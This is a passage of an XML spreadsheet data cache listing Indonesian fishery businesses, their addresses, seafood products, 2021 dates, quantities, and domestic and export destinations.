    <x v="1157"/>
    <s v="CV. JALADRI FOOD"/>
    <s v="Dusun Kedungaron RT 05 RW 02, Kel. Gajahbendo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Patin Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25297"/>
    <x v="1159"/>
    <s v="CV. MARVELL JAYA FISHERY"/>
    <s v="Jl. Poros Maros Graha Cemerlang Blok C No.10/11, Kel. Hasanudin, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Barramundi, Sebelah, Kerapu, Jenaha, Kakatua, Bawal, Kakap)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25298"/>
    <x v="1159"/>
    <s v="CV. MARVELL JAYA FISHERY"/>
    <s v="Jl. Poros Maros Graha Cemerlang Blok C No.10/11, Kel. Hasanudin, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Cakalang, Tenggiri)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25304"/>
    <x v="1160"/>
    <s v="PT. BAHTERA CAHAYA NUSANTARA"/>
    <s v="Jl. Gabion Belawan Komplek PPS, Kel. Bagan Deli, Kec. Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Biji Nangka, Layur, Beloso, Seloncong, Perak-perak, Baronang)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Banda Aceh, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25305"/>
    <x v="1160"/>
    <s v="PT. BAHTERA CAHAYA NUSANTARA"/>
    <s v="Jl. Gabion Belawan Komplek PPS, Kel. Bagan Deli, Kec. Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kota Semarang"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25306"/>
    <x v="1160"/>
    <s v="PT. BAHTERA CAHAYA NUSANTARA"/>
    <s v="Jl. Gabion Belawan Komplek PPS, Kel. Bagan Deli, Kec. Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuring, Semar, Salem, Aso-aso, Tenggiri)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Banda Aceh, Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="25310"/>
    <x v="1161"/>
    <s v="PT, BUMI MENARA INTERNUSA"/>
    <s v="Jl, Kima 15 Kavling R No,4C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="856454000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25312"/>
    <x v="1161"/>
    <s v="PT, BUMI MENARA INTERNUSA"/>
    <s v="Jl, Kima 15 Kavling R No,4C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="364720000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25313"/>
    <x v="1162"/>
    <s v="CV. SUMBER LAUT ABADI"/>
    <s v="Jl. Cemara No.184A, Kel. Pulo Brayan Darat II, Kec. Medan Timur, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kuring, Sarden, Aso-aso, Salem, Layang Biru)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="250000"/>
    <s v="Kabupaten Aceh Tenggara, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kabupaten Muaro Jambi, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25314"/>
    <x v="1162"/>
    <s v="CV. SUMBER LAUT ABADI"/>
    <s v="Jl. Cemara No.184A, Kel. Pulo Brayan Darat II, Kec. Medan Timur, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Aceh Tenggara, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kabupaten Muaro Jambi, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25322"/>
    <x v="633"/>
    <s v="PT. OCEAN PARADISE FISHERY"/>
    <s v="Jl. Poros Limunjan, Gg. Sulawesi RT 019, Kel. Sambaliung, Kec. Sambaliung, Kabupaten Berau&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Demersal Beku (Senangin, Kerapu, Remang, Layur, Bawal, Kakap, Barramundi)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="25323"/>
    <x v="1163"/>
    <s v="THIAM LIAN"/>
    <s v="Kp. Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Layang, Tenggiri)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="14000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25324"/>
    <x v="1163"/>
    <s v="THIAM LIAN"/>
    <s v="Kp. Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Kerapu, Talang-talang, Kakap, Kaci-kaci, Parang-parang)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="14000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25326"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="25327"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Bekicot Rebus Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25328"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Rajungan Rebus Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25344"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Swanggi, Bawal Hitam, Gulama, Kerapu Bintik)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="21000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25345"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Marlin)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25346"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25347"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25351"/>
    <x v="159"/>
    <s v="PT. NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="25352"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Kering"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="25353"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25354"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Kering"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25355"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Kering (Cumi-cumi)"/>
    <d v="2021-06-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25358"/>
    <x v="1164"/>
    <s v="PT. AGAR SWALLOW"/>
    <s v="Jl. Branta Mulia, Kel. Karang Asem Timur, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Agar-agar"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="India, Philippines, Russian Federation"/>
  </r>
  <r>
    <n v="25359"/>
    <x v="1164"/>
    <s v="PT. AGAR SWALLOW"/>
    <s v="Jl. Branta Mulia, Kel. Karang Asem Timur, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="25360"/>
    <x v="1165"/>
    <s v="PT. INDOKING ANEKA AGAR AGAR INDUSTRI"/>
    <s v="Jl. Inpres Pasar II, Kel. Tanjung Gusta, Kec. Sunggal, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tepung Agar-agar"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="6350"/>
    <s v="Kota Medan"/>
    <s v="France, Japan, Malaysia, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="25373"/>
    <x v="1166"/>
    <s v="UD. NUR AMELIA"/>
    <s v="Jl. Abdul Hamid RT 01, Kel. Kasai, Kec. Pulau Derawan, Kabupaten Berau&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Segar"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="33600"/>
    <s v="Kabupaten Berau, Kabupaten Nunukan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25374"/>
    <x v="1166"/>
    <s v="UD. NUR AMELIA"/>
    <s v="Jl. Abdul Hamid RT 01, Kel. Kasai, Kec. Pulau Derawan, Kabupaten Berau&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Demersal Segar (Sebelah, Kerapu, Remang, Kakatua, Bawal, Kakap)"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="48000"/>
    <s v="Kabupaten Berau, Kabupaten Nunukan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25375"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25376"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Layur, Lencam, Kerapu, Kakatua, Kakap, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25377"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25378"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25379"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Air Tawar Beku (Patin)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25380"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25381"/>
    <x v="1167"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU"/>
    <s v="Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25384"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demesal Beku (Barramundi, Bawal, Gulama, Lencam, Kuniran, Anggoli, Kerapu, Layur, Beloso, Kakatua, Kakap, Kaci-kaci)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="3561000"/>
    <m/>
    <s v="Australia, China, Egypt, France, Guadeloupe, Malaysia, Martinique, Netherlands, United Kingdom"/>
  </r>
  <r>
    <n v="25385"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="712000"/>
    <m/>
    <s v="France, Greece, Guadeloupe, Martinique, R√©union, United Kingdom"/>
  </r>
  <r>
    <n v="25386"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Maubara, Julung-julung, Makerel, Lemadang, Marlin, Layaran, Kaca Piring, Kapas-kapas, Tenggiri)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="264000"/>
    <m/>
    <s v="Australia, France, Guadeloupe, Malaysia, Martinique, R√©union, United Kingdom"/>
  </r>
  <r>
    <n v="25387"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="125000"/>
    <m/>
    <s v="France, Guadeloupe, Martinique, R√©union, United Kingdom"/>
  </r>
  <r>
    <n v="25388"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="205000"/>
    <m/>
    <s v="Belgium, France, Guadeloupe, Kuwait, Netherlands, United Kingdom"/>
  </r>
  <r>
    <n v="25389"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25390"/>
    <x v="1168"/>
    <s v="PT. VARIA NIAGA NUSANTARA"/>
    <s v="Dusun Dermo, Desa Gunung Gangsir No.88, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="15"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25392"/>
    <x v="1169"/>
    <s v="CV, MARWA ABADI JAYA"/>
    <s v="Jl, Beringin I RT 09, Kel, Selumit Pantai, Kec, Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Bandeng Segar"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Nunukan"/>
    <m/>
  </r>
  <r>
    <n v="25393"/>
    <x v="1169"/>
    <s v="CV, MARWA ABADI JAYA"/>
    <s v="Jl, Beringin I RT 09, Kel, Selumit Pantai, Kec, Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi)"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Nunukan"/>
    <m/>
  </r>
  <r>
    <n v="25394"/>
    <x v="1169"/>
    <s v="CV, MARWA ABADI JAYA"/>
    <s v="Jl, Beringin I RT 09, Kel, Selumit Pantai, Kec, Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Cakalang)"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25395"/>
    <x v="1170"/>
    <s v="IR'EL TING"/>
    <s v="Jaga XII, Kel. Watutumou, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sambal Roa"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="25"/>
    <s v="Kota Jakarta Pusat, Kota Salatiga, Kota Manado, Kota Palu"/>
    <m/>
  </r>
  <r>
    <n v="25396"/>
    <x v="1170"/>
    <s v="IR'EL TING"/>
    <s v="Jaga XII, Kel. Watutumou, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Abon Ikan"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="30"/>
    <s v="Kota Jakarta Pusat, Kota Salatiga, Kota Manado, Kota Palu"/>
    <m/>
  </r>
  <r>
    <n v="25397"/>
    <x v="1171"/>
    <s v="RIZKI BULIAN"/>
    <s v="Jl. Hutan Lindung RT 16, Kel. Rengas Condong, Kec. Muara Bulian, Kabupaten Batang Hari&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Stik Udang"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25398"/>
    <x v="1171"/>
    <s v="RIZKI BULIAN"/>
    <s v="Jl. Hutan Lindung RT 16, Kel. Rengas Condong, Kec. Muara Bulian, Kabupaten Batang Hari&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Teri Crispy"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25399"/>
    <x v="1172"/>
    <s v="CV. HENGLY JAYA GUSTAMA"/>
    <s v="Jl. Alah Air, Kel. Selat Panjang Selatan, Kec. Tebing Tinggi, Kabupaten Kepulauan Meranti&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Kering"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25405"/>
    <x v="1173"/>
    <s v="IWA-QU"/>
    <s v="Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kembang Goyang Udang"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25406"/>
    <x v="1173"/>
    <s v="IWA-QU"/>
    <s v="Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Stik Jagung Ikan"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="25407"/>
    <x v="1173"/>
    <s v="IWA-QU"/>
    <s v="Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Stik Udang"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="300"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
